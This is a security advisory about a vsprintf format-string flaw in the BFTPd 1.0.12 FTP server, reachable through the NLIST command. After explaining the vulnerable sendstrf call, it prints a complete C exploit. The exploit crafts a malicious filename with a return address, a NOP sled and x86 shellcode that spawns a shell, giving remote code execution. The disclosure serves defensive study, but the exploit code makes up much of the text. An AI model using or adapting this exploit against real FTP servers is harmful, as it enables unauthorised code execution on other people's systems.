Malformed vsprintf in BFTPd allows execution of arbitrary code

------------------------------------------------------------------------





SUMMARY



 <http://c.codercity.de/bruksoft/> BFTPd is a Linux FTP server with chroot 

and setreuid functionality. The latest version of BFTP has a potential 

security problem when the NSLT command is requested to list a file that 

contains a formatting string. The vulnerability allows remote attackers to 

overflow internal buffers, and execute arbitrary code.



DETAILS



Vulnerable systems:

BFTPd 1.0.12



There is a malformed call to vsprintf in BFTPd. The relevant vulnerable 

function is sendstrf:



int sendstrf(int s, char *format, ...) {

 ....

  vsprintf(buffer, format, val);



When the function is called from an NLIST command, it is incorrectly 

allowed to supply formatting string to the vsprintf:



  else

      foo = 1;

      sendstrf(s, entry->d_name);

    }



This can be used to overflow the buffer of the vsprintf and execute 

arbitrary code.



Exploit:

/*

Creates a filname to exploit the bug in bftpd 1.0.12

Create the file, cwd in the shell directory and nlist the file directory

(sh is executed in the working dir because it is not possible to insert a 

/ in

the filename)



hints by |CyRaX| & Cthulhu

coded by asynchro



www.pkcrew.org

*/



#include 

#include 



#define BUFSIZE 512

#define NOP 124



main()

{

int i;

char *buff;

char nop=0x90;

char addr[]="\xd4\xf9\xff\xbf";

char command[]="touch %.260x";

char shellcode[]=



"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"

"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"

"\x80\xe8\xdc\xff\xff\xffsh";





buff=(char *) malloc(BUFSIZE);

memset(buff,0x0,BUFSIZE);

memcpy(buff,command,sizeof(command));



strncat(buff,addr,4);

strncat(buff,addr,4);



for(i=0; i < NOP ;i++)

{

strncat(buff,&nop,1);

}



strncat(buff,shellcode,strlen(shellcode));

system(buff);

}





ADDITIONAL INFORMATION



The information has been provided by   

asynchro.